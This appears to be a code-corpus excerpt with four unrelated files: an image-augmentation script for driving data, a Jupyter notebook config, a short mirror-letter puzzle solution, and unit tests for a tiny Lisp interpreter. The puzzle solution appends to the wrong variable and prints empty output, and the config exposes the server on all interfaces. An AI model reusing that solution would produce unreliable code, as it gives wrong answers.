    bright_img = cv2.cvtColor(np.array(hsv, dtype=np.uint8), cv2.COLOR_HSV2BGR)
    adjusted_inputs = copy.deepcopy(inputs)
    adjusted_inputs[0] = bright_img
    return adjusted_inputs, outputs
def aug_shadow(inputs, outputs):
    """Cast a random straight-edged shadow over the image.

    A random dividing line is drawn across the frame; the lightness (L)
    channel on one randomly chosen side of the line is halved in HLS
    space.  Outputs pass through unchanged; a deep copy of *inputs* is
    returned with the shadowed image in slot 0.

    Bug fix: ``random_bright`` was previously assigned only behind a
    ``np.random.randint(2)`` coin flip, but is used unconditionally in
    both branches below — roughly half of all calls raised
    ``UnboundLocalError``.  The darkening factor is now always defined.
    """
    img = inputs[0]
    # Random shadow boundary: a line from (top_x, top_y) to (bot_x, bot_y).
    top_y = 320 * np.random.uniform()
    top_x = 0
    bot_x = 160
    bot_y = 320 * np.random.uniform()
    image_hls = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)
    shadow_mask = 0 * image_hls[:, :, 1]
    X_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][0]
    Y_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][1]
    # Mark every pixel on one side of the random line.
    shadow_mask[((X_m - top_x) * (bot_y - top_y) - (bot_x - top_x) * (Y_m - top_y) >= 0)] = 1
    # random_bright = .25+.7*np.random.uniform()
    random_bright = .5
    cond1 = shadow_mask == 1
    cond0 = shadow_mask == 0
    # Randomly darken either the masked or the unmasked side.
    if np.random.randint(2) == 1:
        image_hls[:, :, 1][cond1] = image_hls[:, :, 1][cond1] * random_bright
    else:
        image_hls[:, :, 1][cond0] = image_hls[:, :, 1][cond0] * random_bright
    img = cv2.cvtColor(image_hls, cv2.COLOR_HLS2BGR)
    augmented_inputs = copy.deepcopy(inputs)
    augmented_inputs[0] = img
    return augmented_inputs, outputs
def aug_shadow2(inputs, outputs):
    """Strong shadow variant: always darken one random side of the image.

    Scales the HLS H and L channels by 0.4 and the S channel by 0.2 on a
    randomly chosen side of a random diagonal split. The initial
    BGR->HSV->BGR round trip reproduces the original's preprocessing.
    """
    img = cv2.cvtColor(inputs[0], cv2.COLOR_BGR2HSV)
    img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)
    top_y = 320 * np.random.uniform()
    top_x = 0
    bot_x = 160
    bot_y = 320 * np.random.uniform()
    hls = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)
    mask = hls[:, :, 1] * 0
    rows = np.mgrid[0:img.shape[0], 0:img.shape[1]][0]
    cols = np.mgrid[0:img.shape[0], 0:img.shape[1]][1]
    mask[((rows - top_x) * (bot_y - top_y) - (bot_x - top_x) * (cols - top_y) >= 0)] = 1
    dim_factor = .4
    desat_factor = .2
    # Randomly pick which side of the split gets darkened.
    side = mask == np.random.randint(2)
    hls[:, :, 0][side] = hls[:, :, 0][side] * dim_factor
    hls[:, :, 1][side] = hls[:, :, 1][side] * dim_factor
    hls[:, :, 2][side] = hls[:, :, 2][side] * desat_factor
    shadowed = cv2.cvtColor(hls, cv2.COLOR_HLS2BGR)
    shadowed_inputs = copy.deepcopy(inputs)
    shadowed_inputs[0] = shadowed
    return shadowed_inputs, outputs
def augment_flip(img, data):
    """Mirror the image left-right and negate steering-related telemetry.

    Returns a (flipped_image, adjusted_data) pair. *data* is deep-copied
    so the caller's record is untouched. Both the scalar value and its
    history list (when present as a list) are sign-flipped.

    NOTE: if the sonar channels are ever re-enabled, left/right values
    (and their histories) must also be swapped for a mirrored image.
    """
    adjusted = copy.deepcopy(data)
    mirrored = cv2.flip(img, 1)
    sign_flip_keys = [
        'user/angle',
        'history/user/angle',
    ]
    for key in sign_flip_keys:
        value = adjusted[key]
        if isinstance(value, list):
            adjusted[key] = [0 - item for item in value]
        else:
            adjusted[key] = 0 - value
    return (mirrored, adjusted)
def augment_brightness(img, data):
    """Scale image brightness by a random factor in [0.2, 1.2).

    Operates on the V channel in HSV space and clamps at 255; the
    telemetry dict is returned unchanged.
    """
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    hsv = np.array(hsv, dtype=np.float64)
    factor = .2 + np.random.uniform()
    value = hsv[:, :, 2] * factor
    value[value > 255] = 255
    hsv[:, :, 2] = value
    result = cv2.cvtColor(np.array(hsv, dtype=np.uint8), cv2.COLOR_HSV2BGR)
    return (result, data)
def augment_shadow(img, data):
    """With 50% probability, darken one side of a random diagonal split.

    Same effect as aug_shadow but operating on a bare (img, data) record.

    NOTE(review): the source file's indentation was mangled; this follows
    the standard form of this augmentation in which the darkening step is
    guarded by the first coin flip (otherwise `random_bright` would be
    unbound) — confirm against the original file.
    """
    top_y = 320 * np.random.uniform()
    top_x = 0
    bot_x = 160
    bot_y = 320 * np.random.uniform()
    hls = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)
    mask = 0 * hls[:, :, 1]
    rows = np.mgrid[0:img.shape[0], 0:img.shape[1]][0]
    cols = np.mgrid[0:img.shape[0], 0:img.shape[1]][1]
    mask[((rows - top_x) * (bot_y - top_y) - (bot_x - top_x) * (cols - top_y) >= 0)] = 1
    if np.random.randint(2) == 1:
        random_bright = .5
        in_region = mask == 1
        out_region = mask == 0
        if np.random.randint(2) == 1:
            hls[:, :, 1][in_region] = hls[:, :, 1][in_region] * random_bright
        else:
            hls[:, :, 1][out_region] = hls[:, :, 1][out_region] * random_bright
    img = cv2.cvtColor(hls, cv2.COLOR_HLS2BGR)
    return (img, data)
#
# customer defined functions
#
# gaussian blur
def augment_gaussian_blur(img, data):
    """Apply a Gaussian blur to the image; telemetry is passed through."""
    blurred = ImgGaussianBlur().run(img)
    return (blurred, data)
# threshold
def augment_threshold(img, data):
    """Apply an image threshold filter; telemetry is passed through."""
    thresholded = ImgThreshold().img_threshold(img)
    return (thresholded, data)
#
# Module-level settings for the style-transfer augmentation; augment()
# rebinds them (via `global`) before each style_aug round.
augment_style_alpha = 0.1
augment_style_gpu_enabled = 0
# style augmentation
def augment_style(img, data):
    """Apply neural style transfer using the module-level alpha/GPU settings."""
    styled = ImgStyleAug().img_style(img, augment_style_alpha,
                                     augment_style_gpu_enabled)
    return (styled, data)
# canny
def augment_canny(img, data):
    """Apply Canny edge detection to the image; telemetry is passed through."""
    edges = ImgCanny().run(img)
    return (edges, data)
def augment(target, out=None, method_args='all', gpu_enabled=0):
    """Augment every record*.json under *target*, writing results to *out*.

    target: directory holding record_<n>.json files.
    out: destination directory; defaults to *target* (augment in place).
    method_args: which augmentations to run; substring membership, so e.g.
        'all', 'classic', 'gaussian', 'threshold', 'canny', 'style_aug'.
    gpu_enabled: 1 to let the style-transfer augmentation use the GPU.
    """
    print('Start augmentation')
    records = glob.glob('%s/record*.json' % target)
    # Bug fix: use a raw string so '\d' is a regex digit class rather than an
    # invalid string escape, and escape the literal dot before the extension.
    records = ((int(re.search(r'.+_(\d+)\.json', path).group(1)), path)
               for path in records)
    # Directories starting with underscore are skipped in training.
    # Originals have no history augmented so have to be skipped.
    size, init_path = initialize_records(records, target, out, "_original")
    count = size
    if not out:
        out = target
    print(' Augmenting %d records from "%s". Target folder: "%s"'
          % (count, target, out))
    # Bug fix: compare paths by value; `is not` checked object identity, which
    # misbehaves for equal strings created separately.
    if target != out:
        # Bug fix: the path was passed as a second print() argument instead of
        # being %-formatted into the message (and "copies" -> "copied").
        print(' Original files copied to "%s"' % init_path)
    print(' -------------------------------------------------')
    if 'all' in method_args or 'classic' in method_args:
        # Classic rounds chain: each consumes the previous round's output.
        size, history_path = augmentation_round(init_path, out, count, 'history', augment_history, gen_history_meta)
        count = count + size
        size, flipped_path = augmentation_round(history_path, out, count, 'flipped', augment_flip)
        count = count + size
        size, bright_path = augmentation_round(flipped_path, out, count, 'bright', augment_brightness)
        count = count + size
        size, shadow_path = augmentation_round(bright_path, out, count, 'shadow', augment_shadow)
        count = count + size
    if 'all' in method_args or 'gaussian' in method_args:
        size, gaussian_path = augmentation_round(init_path, out, count, 'gaussian_blur', augment_gaussian_blur)
        count = count + size
    if 'all' in method_args or 'threshold' in method_args:
        size, threshold = augmentation_round(init_path, out, count, 'threshold', augment_threshold)
        count = count + size
    if 'all' in method_args or 'canny' in method_args:
        size, canny = augmentation_round(init_path, out, count, 'canny', augment_canny)
        count = count + size
    if 'all' in method_args or 'style_aug' in method_args:
        global augment_style_alpha
        global augment_style_gpu_enabled
        if gpu_enabled:
            augment_style_gpu_enabled = 1
        # Run two style rounds at different blend strengths.
        augment_style_alpha = 0.1
        size, style = augmentation_round(init_path, out, count, 'style_aug_01', augment_style)
        count = count + size
        augment_style_alpha = 0.5
        size, style = augmentation_round(init_path, out, count, 'style_aug05', augment_style)
        count = count + size
    print(' -------------------------------------------------')
    print('Augmentation done. Total records %s.' % count)
def is_empty(dir):
    """Return True if directory *dir* contains no entries."""
    return len(os.listdir(dir)) == 0
if __name__ == '__main__':
    args = docopt(__doc__)
    target_path = args['--path']
    out_path = args['--out']
    method = args['--method']
    method_args = 'all'
    gpu_enabled_args = args['--gpu_enabled']
    if out_path:
        ensure_directory(out_path)
    if method:
        method_args = method
    # --gpu_enabled arrives as a string; anything other than '1' disables it.
    if gpu_enabled_args == '1':
        gpu_enabled = 1
    else:
        gpu_enabled = 0
    print(gpu_enabled)
    # Bug fix: `is not` compared string identity, not equality, so a target
    # path equal to the out path (typed separately) was wrongly required to
    # be empty. Compare by value instead.
    if out_path and target_path != out_path and not is_empty(out_path):
        print(' Target folder "%s" must be empty' % out_path)
    else:
        augment(target_path, out_path, method_args, gpu_enabled)
| [
"juan.furiaz88@gmail.com"
] | juan.furiaz88@gmail.com |
c5cd9803310de08be4dfccdbf91203ea1335033c | e6e9efdce3418812d612630c770e985c0a5ff627 | /conf/jupyter_notebook_config.py | a4ddf9bf562014f2d622ee0843703f427353a3bb | [] | no_license | JamesDommisse/JupyterDocker | 0310f5b57c32492286890fa53044bca8b4866db3 | ad9a2e887e887559665c796798eca45315425d14 | refs/heads/master | 2021-01-15T15:32:37.179709 | 2016-08-24T21:54:32 | 2016-08-24T21:54:32 | 65,316,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,236 | py | # Configuration file for jupyter-notebook.
#------------------------------------------------------------------------------
# Configurable configuration
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# LoggingConfigurable configuration
#------------------------------------------------------------------------------
# A parent class for Configurables that log.
#
# Subclasses have a log trait, and the default behavior is to get the logger
# from the currently running Application.
#------------------------------------------------------------------------------
# SingletonConfigurable configuration
#------------------------------------------------------------------------------
# A configurable that only allows one instance.
#
# This class is for classes that should only have one instance of itself or
# *any* subclass. To create and retrieve such a class use the
# :meth:`SingletonConfigurable.instance` method.
#------------------------------------------------------------------------------
# Application configuration
#------------------------------------------------------------------------------
# This is an application.
# The date format used by logging formatters for %(asctime)s
# c.Application.log_datefmt = '%Y-%m-%d %H:%M:%S'
# The Logging format template
# c.Application.log_format = '[%(name)s]%(highlevel)s %(message)s'
# Set the log level by value or name.
# c.Application.log_level = 30
#------------------------------------------------------------------------------
# JupyterApp configuration
#------------------------------------------------------------------------------
# Base class for Jupyter applications
# Answer yes to any prompts.
# c.JupyterApp.answer_yes = False
# Full path of a config file.
# c.JupyterApp.config_file = ''
# Specify a config file to load.
# c.JupyterApp.config_file_name = ''
# Generate default config file.
# c.JupyterApp.generate_config = False
#------------------------------------------------------------------------------
# NotebookApp configuration
#------------------------------------------------------------------------------
# Set the Access-Control-Allow-Credentials: true header
# c.NotebookApp.allow_credentials = False
# Set the Access-Control-Allow-Origin header
#
# Use '*' to allow any origin to access your server.
#
# Takes precedence over allow_origin_pat.
# c.NotebookApp.allow_origin = ''
# Use a regular expression for the Access-Control-Allow-Origin header
#
# Requests from an origin matching the expression will get replies with:
#
# Access-Control-Allow-Origin: origin
#
# where `origin` is the origin of the request.
#
# Ignored if allow_origin is set.
# c.NotebookApp.allow_origin_pat = ''
# DEPRECATED use base_url
# c.NotebookApp.base_project_url = '/'
# The base URL for the notebook server.
#
# Leading and trailing slashes can be omitted, and will automatically be added.
# c.NotebookApp.base_url = '/'
# Specify what command to use to invoke a web browser when opening the notebook.
# If not specified, the default browser will be determined by the `webbrowser`
# standard library module, which allows setting of the BROWSER environment
# variable to override it.
# c.NotebookApp.browser = ''
# The full path to an SSL/TLS certificate file.
# c.NotebookApp.certfile = ''
# The full path to a certificate authority certifificate for SSL/TLS client
# authentication.
# c.NotebookApp.client_ca = ''
# The config manager class to use
# c.NotebookApp.config_manager_class = 'notebook.services.config.manager.ConfigManager'
# The notebook manager class to use.
# c.NotebookApp.contents_manager_class = 'notebook.services.contents.filemanager.FileContentsManager'
# Extra keyword arguments to pass to `set_secure_cookie`. See tornado's
# set_secure_cookie docs for details.
# c.NotebookApp.cookie_options = {}
# The random bytes used to secure cookies. By default this is a new random
# number every time you start the Notebook. Set it to a value in a config file
# to enable logins to persist across server sessions.
#
# Note: Cookie secrets should be kept private, do not share config files with
# cookie_secret stored in plaintext (you can read the value from a file).
# c.NotebookApp.cookie_secret = b''
# The file where the cookie secret is stored.
# c.NotebookApp.cookie_secret_file = ''
# The default URL to redirect to from `/`
# c.NotebookApp.default_url = '/tree'
# Whether to enable MathJax for typesetting math/TeX
#
# MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
# very large, so you may want to disable it if you have a slow internet
# connection, or for offline use of the notebook.
#
# When disabled, equations etc. will appear as their untransformed TeX source.
# c.NotebookApp.enable_mathjax = True
# extra paths to look for Javascript notebook extensions
# c.NotebookApp.extra_nbextensions_path = []
# Extra paths to search for serving static files.
#
# This allows adding javascript/css to be available from the notebook server
# machine, or overriding individual files in the IPython
# c.NotebookApp.extra_static_paths = []
# Extra paths to search for serving jinja templates.
#
# Can be used to override templates from notebook.templates.
# c.NotebookApp.extra_template_paths = []
#
# c.NotebookApp.file_to_run = ''
# Use minified JS file or not, mainly use during dev to avoid JS recompilation
# c.NotebookApp.ignore_minified_js = False
# (bytes/sec) Maximum rate at which messages can be sent on iopub before they
# are limited.
# c.NotebookApp.iopub_data_rate_limit = 0
# (msg/sec) Maximum rate at which messages can be sent on iopub before they are
# limited.
# c.NotebookApp.iopub_msg_rate_limit = 0
# The IP address the notebook server will listen on.
c.NotebookApp.ip = '0.0.0.0'
# Supply extra arguments that will be passed to Jinja environment.
# c.NotebookApp.jinja_environment_options = {}
# Extra variables to supply to jinja templates when rendering.
# c.NotebookApp.jinja_template_vars = {}
# The kernel manager class to use.
# c.NotebookApp.kernel_manager_class = 'notebook.services.kernels.kernelmanager.MappingKernelManager'
# The kernel spec manager class to use. Should be a subclass of
# `jupyter_client.kernelspec.KernelSpecManager`.
#
# The Api of KernelSpecManager is provisional and might change without warning
# between this version of Jupyter and the next stable one.
# c.NotebookApp.kernel_spec_manager_class = 'jupyter_client.kernelspec.KernelSpecManager'
# The full path to a private key file for usage with SSL/TLS.
# c.NotebookApp.keyfile = ''
# The login handler class to use.
# c.NotebookApp.login_handler_class = 'notebook.auth.login.LoginHandler'
# The logout handler class to use.
# c.NotebookApp.logout_handler_class = 'notebook.auth.logout.LogoutHandler'
# The url for MathJax.js.
# c.NotebookApp.mathjax_url = ''
# Dict of Python modules to load as notebook server extensions. Entry values
# can be used to enable and disable the loading of the extensions.
# c.NotebookApp.nbserver_extensions = {}
# The directory to use for notebooks and kernels.
# c.NotebookApp.notebook_dir = ''
# Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library `webbrowser`
# module, unless it is overridden using the --browser (NotebookApp.browser)
# configuration option.
c.NotebookApp.open_browser = False
# Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from notebook.auth import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
# c.NotebookApp.password = ''
# The port the notebook server will listen on.
c.NotebookApp.port = 8888
# The number of additional ports to try if the specified port is not available.
# c.NotebookApp.port_retries = 50
# DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
# c.NotebookApp.pylab = 'disabled'
# (sec) Time window used to check the message and data rate limits.
# c.NotebookApp.rate_limit_window = 1.0
# Reraise exceptions encountered loading server extensions?
# c.NotebookApp.reraise_server_extension_failures = False
# DEPRECATED use the nbserver_extensions dict instead
# c.NotebookApp.server_extensions = []
# The session manager class to use.
# c.NotebookApp.session_manager_class = 'notebook.services.sessions.sessionmanager.SessionManager'
# Supply SSL options for the tornado HTTPServer. See the tornado docs for
# details.
# c.NotebookApp.ssl_options = {}
# Supply overrides for the tornado.web.Application that the Jupyter notebook
# uses.
# c.NotebookApp.tornado_settings = {}
# Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headerssent by the upstream reverse proxy. Necessary if the proxy handles
# SSL
# c.NotebookApp.trust_xheaders = False
# DEPRECATED, use tornado_settings
# c.NotebookApp.webapp_settings = {}
# The base URL for websockets, if it differs from the HTTP server (hint: it
# almost certainly doesn't).
#
# Should be in the form of an HTTP origin: ws[s]://hostname[:port]
# c.NotebookApp.websocket_url = ''
#------------------------------------------------------------------------------
# ConnectionFileMixin configuration
#------------------------------------------------------------------------------
# Mixin for configurable classes that work with connection files
# JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
# c.ConnectionFileMixin.connection_file = ''
# set the control (ROUTER) port [default: random]
# c.ConnectionFileMixin.control_port = 0
# set the heartbeat port [default: random]
# c.ConnectionFileMixin.hb_port = 0
# set the iopub (PUB) port [default: random]
# c.ConnectionFileMixin.iopub_port = 0
# Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
# c.ConnectionFileMixin.ip = ''
# set the shell (ROUTER) port [default: random]
# c.ConnectionFileMixin.shell_port = 0
# set the stdin (ROUTER) port [default: random]
# c.ConnectionFileMixin.stdin_port = 0
#
# c.ConnectionFileMixin.transport = 'tcp'
#------------------------------------------------------------------------------
# KernelManager configuration
#------------------------------------------------------------------------------
# Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
# Should we autorestart the kernel if it dies.
# c.KernelManager.autorestart = True
# DEPRECATED: Use kernel_name instead.
#
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a configuration file, Jupyter does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it given on the Jupyter command
# line.
# c.KernelManager.kernel_cmd = []
#------------------------------------------------------------------------------
# Session configuration
#------------------------------------------------------------------------------
# Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, `key` will be initialized
# to the contents of the file.
# Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
# c.Session.buffer_threshold = 1024
# Whether to check PID to protect against calls after fork.
#
# This check can be disabled if fork-safety is handled elsewhere.
# c.Session.check_pid = True
# Threshold (in bytes) beyond which a buffer should be sent without copying.
# c.Session.copy_threshold = 65536
# Debug output in the Session
# c.Session.debug = False
# The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
# c.Session.digest_history_size = 65536
# The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
# c.Session.item_threshold = 64
# execution key, for signing messages.
# c.Session.key = b''
# path to file containing execution key.
# c.Session.keyfile = ''
# Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
# c.Session.metadata = {}
# The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
# c.Session.packer = 'json'
# The UUID identifying this session.
# c.Session.session = ''
# The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
# c.Session.signature_scheme = 'hmac-sha256'
# The name of the unpacker for unserializing messages. Only used with custom
# functions for `packer`.
# c.Session.unpacker = 'json'
# Username for the Session. Default is your system username.
# c.Session.username = 'james'
#------------------------------------------------------------------------------
# MultiKernelManager configuration
#------------------------------------------------------------------------------
# A class for managing multiple kernels.
# The name of the default kernel to start
# c.MultiKernelManager.default_kernel_name = 'python3'
# The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
# c.MultiKernelManager.kernel_manager_class = 'jupyter_client.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# MappingKernelManager configuration
#------------------------------------------------------------------------------
# A KernelManager that handles notebook mapping and HTTP error handling
#
# c.MappingKernelManager.root_dir = ''
#------------------------------------------------------------------------------
# ContentsManager configuration
#------------------------------------------------------------------------------
# Base class for serving files and directories.
#
# This serves any text or binary file, as well as directories, with special
# handling for JSON notebook documents.
#
# Most APIs take a path argument, which is always an API-style unicode path, and
# always refers to a directory.
#
# - unicode, not url-escaped
# - '/'-separated
# - leading and trailing '/' will be stripped
# - if unspecified, path defaults to '',
# indicating the root path.
#
# c.ContentsManager.checkpoints = None
#
# c.ContentsManager.checkpoints_class = 'notebook.services.contents.checkpoints.Checkpoints'
#
# c.ContentsManager.checkpoints_kwargs = {}
# Glob patterns to hide in file and directory listings.
# c.ContentsManager.hide_globs = ['__pycache__', '*.pyc', '*.pyo', '.DS_Store', '*.so', '*.dylib', '*~']
# Python callable or importstring thereof
#
# To be called on a contents model prior to save.
#
# This can be used to process the structure, such as removing notebook outputs
# or other side effects that should not be saved.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(path=path, model=model, contents_manager=self)
#
# - model: the model to be saved. Includes file contents.
# Modifying this dict will affect the file that is stored.
# - path: the API path of the save destination
# - contents_manager: this ContentsManager instance
# c.ContentsManager.pre_save_hook = None
# The base name used when creating untitled directories.
# c.ContentsManager.untitled_directory = 'Untitled Folder'
# The base name used when creating untitled files.
# c.ContentsManager.untitled_file = 'untitled'
# The base name used when creating untitled notebooks.
# c.ContentsManager.untitled_notebook = 'Untitled'
#------------------------------------------------------------------------------
# FileManagerMixin configuration
#------------------------------------------------------------------------------
# Mixin for ContentsAPI classes that interact with the filesystem.
#
# Provides facilities for reading, writing, and copying both notebooks and
# generic files.
#
# Shared by FileContentsManager and FileCheckpoints.
#
# Note ---- Classes using this mixin must provide the following attributes:
#
# root_dir : unicode
# A directory against which API-style paths are to be resolved.
#
# log : logging.Logger
# By default notebooks are saved to disk via a temporary file which, if
# successfully written, replaces the old one. This procedure, namely
# 'atomic_writing', causes some bugs on file systems without operation order
# enforcement (like some networked filesystems). If set to False, the new
# notebook is written directly over the old one, which could fail (e.g. full
# filesystem or quota).
# c.FileManagerMixin.use_atomic_writing = True
#------------------------------------------------------------------------------
# FileContentsManager configuration
#------------------------------------------------------------------------------
# Python callable or importstring thereof
#
# to be called on the path of a file just saved.
#
# This can be used to process the file on disk, such as converting the notebook
# to a script or HTML via nbconvert.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(os_path=os_path, model=model, contents_manager=instance)
#
# - path: the filesystem path to the file just written - model: the model
# representing the file - contents_manager: this ContentsManager instance
# c.FileContentsManager.post_save_hook = None
#
# c.FileContentsManager.root_dir = ''
# DEPRECATED, use post_save_hook. Will be removed in Notebook 5.0
# c.FileContentsManager.save_script = False
#------------------------------------------------------------------------------
# NotebookNotary configuration
#------------------------------------------------------------------------------
# A class for computing and verifying notebook signatures.
# The hashing algorithm used to sign notebooks.
# c.NotebookNotary.algorithm = 'sha256'
# The number of notebook signatures to cache. When the number of signatures
# exceeds this value, the oldest 25% of signatures will be culled.
# c.NotebookNotary.cache_size = 65535
# The sqlite file in which to store notebook signatures. By default, this will
# be in your Jupyter data directory. You can set it to ':memory:' to disable
# sqlite writing to the filesystem.
# c.NotebookNotary.db_file = ''
# The secret key with which notebooks are signed.
# c.NotebookNotary.secret = b''
# The file where the secret key is stored.
# c.NotebookNotary.secret_file = ''
#------------------------------------------------------------------------------
# KernelSpecManager configuration
#------------------------------------------------------------------------------
# If there is no Python kernelspec registered and the IPython kernel is
# available, ensure it is added to the spec list.
# c.KernelSpecManager.ensure_native_kernel = True
# The kernel spec class. This is configurable to allow subclassing of the
# KernelSpecManager for customized behavior.
# c.KernelSpecManager.kernel_spec_class = 'jupyter_client.kernelspec.KernelSpec'
# Whitelist of allowed kernel names.
#
# By default, all installed kernels are allowed.
# c.KernelSpecManager.whitelist = set()
| [
"James.Dommisse@gmail.com"
] | James.Dommisse@gmail.com |
d2be3ec81f8f049e8a70a3c02bca4c7f5d207554 | 96e38b89fa057fa0c1cf34e498b4624041dfc6e2 | /BOJ/String/Python/4583.py | a995a37188226e83d4452414ace1a0952986cac9 | [] | no_license | malkoG/polyglot-cp | 66059246b01766da3c359dbd16f04348d3c7ecd2 | 584763144afe40d73e72dd55f90ee1206029ca8f | refs/heads/master | 2021-11-24T13:33:49.625237 | 2019-10-06T07:42:49 | 2019-10-06T07:42:49 | 176,255,722 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | mirror=dict()
mirror['b'] = 'd'
mirror['d'] = 'b'
mirror['q'] = 'p'
mirror['p'] = 'q'
for ch in 'iovwx':
mirror[ch] = ch
while True:
s=input()
if s =="#":
break
result = ''
flag = True
for ch in s:
try:
s += mirror[ch]
except:
flag = False
break
if flag:
print(result)
else:
print("INVALID")
| [
"rijgndqw012@gmail.com"
] | rijgndqw012@gmail.com |
2a12294b3386cab34c9fd7340aa33088ecd84771 | 6345da7e3b648c5e0a2a4ed77a35a1a25066308d | /petit_lisp/test_petit.py | 7e892bde3ad6861f9701633bed4af7e613a569d6 | [] | no_license | aroberge/splore | 1550a5348162c110baceb877a2fd3045db78fbf5 | 34d97a19897bae48d9aed5f759589bf9bed1b7ef | refs/heads/master | 2021-10-11T06:05:45.253376 | 2021-10-10T19:23:48 | 2021-10-10T19:23:48 | 28,837,513 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,491 | py | ''' usage: python test_petit.py [v?]
optional argument: v? where ? is a number will use the petit_lisp.py version
located in v?/petit_lisp.py otherwise the default (final)
version will be used.
'''
import mock
import unittest
if __name__ == '__main__':
    import sys
    import os
    # Optional "v?" argument: test the work-in-progress interpreter stored
    # in v?/petit_lisp.py instead of the final version (see module docstring).
    if len(sys.argv) > 1 and sys.argv[1].startswith('v'):
        sys.path.insert(0, os.path.join(os.getcwd(), sys.argv[1]))
        try:
            # "v3" -> 3; fall back to float for versions like "v2.5".
            version = int(sys.argv[1][1:])
        except ValueError:
            version = float(sys.argv[1][1:])
        # Strip the version argument so unittest.main() does not see it.
        sys.argv.pop(1)
        import petit_lisp as pl
    else:
        # 0 means: the default (final) version; no skipIf guards fire.
        version = 0
        import petit_lisp as pl
# Since we focus on a read-eval-print loop version, we only test the main
# parts of the interpreter ("read", "parse", "eval") and do not
# test the helper functions, which leaves us with the flexibility to
# change them as the design evolves and still have non-failing tests
# for all versions.
class TestRead(unittest.TestCase):
    '''Verify that user input is read correctly, whether an expression
       arrives on a single line or is spread over several lines.'''

    @mock.patch('builtins.input', return_value="(a b c)")
    def test_get_expr_all_at_once(self, mock_input):
        expr = pl.read_expression()
        self.assertEqual("(a b c)", expr)

    @unittest.skipIf(0 < version < 2, '')
    @mock.patch('builtins.input', side_effect=['(a', 'b', 'c)'])
    def test_get_expr_in_parts(self, mock_input):
        expr = pl.read_expression()
        self.assertEqual("(a b c)", expr)
class TestParse(unittest.TestCase):
    '''Verify that expressions are parsed correctly into the expected
       "list of lists" representation.'''

    def test_parse_add(self):
        self.assertEqual(['+', 3, 4], pl.parse("(+ 3 4)"), msg="basic")
        self.assertEqual(['+', 3, 4], pl.parse(" ( + 3 4 ) "),
                         msg="extra spaces")

    def test_parse_add_more(self):
        self.assertEqual(['+', 3, 4, 5], pl.parse(" ( + 3 4 5)"),
                         msg="more args")

    @unittest.skipIf(0 < version < 3, '')
    def test_parse_two_levels(self):
        expected = ['*', ['+', 3, 4], ['-', 2, 1]]
        self.assertEqual(expected, pl.parse(" (* ( + 3 4) (- 2 1))"))
class TestEvaluate(unittest.TestCase):
    '''Evaluate expressions, using the parse function as a first step'''
    # Each @skipIf guard keys a test to the interpreter feature set: a test
    # runs only when the module-level `version` is 0 (0 < 0 is false, so
    # nothing is skipped) or at least the version introducing the feature.
    def test_add(self):
        self.assertEqual(7, pl.evaluate(pl.parse("(+ 3 4)")))
    @unittest.skipIf(0 < version < 2, '')
    def test_add_floats(self):
        self.assertEqual(7.75, pl.evaluate(pl.parse("(+ 3.25 4.5)")))
    @unittest.skipIf(0 < version < 2, '')
    def test_sub(self):
        self.assertEqual(1, pl.evaluate(pl.parse("(- 4 3)")))
        self.assertEqual(-1, pl.evaluate(pl.parse("(- 3 4)")))
    def test_add_many(self):
        self.assertEqual(12, pl.evaluate(pl.parse("(+ 3 4 5)")))
    @unittest.skipIf(0 < version < 2, '')
    def test_mul(self):
        self.assertEqual(12, pl.evaluate(pl.parse("(* 3 4)")))
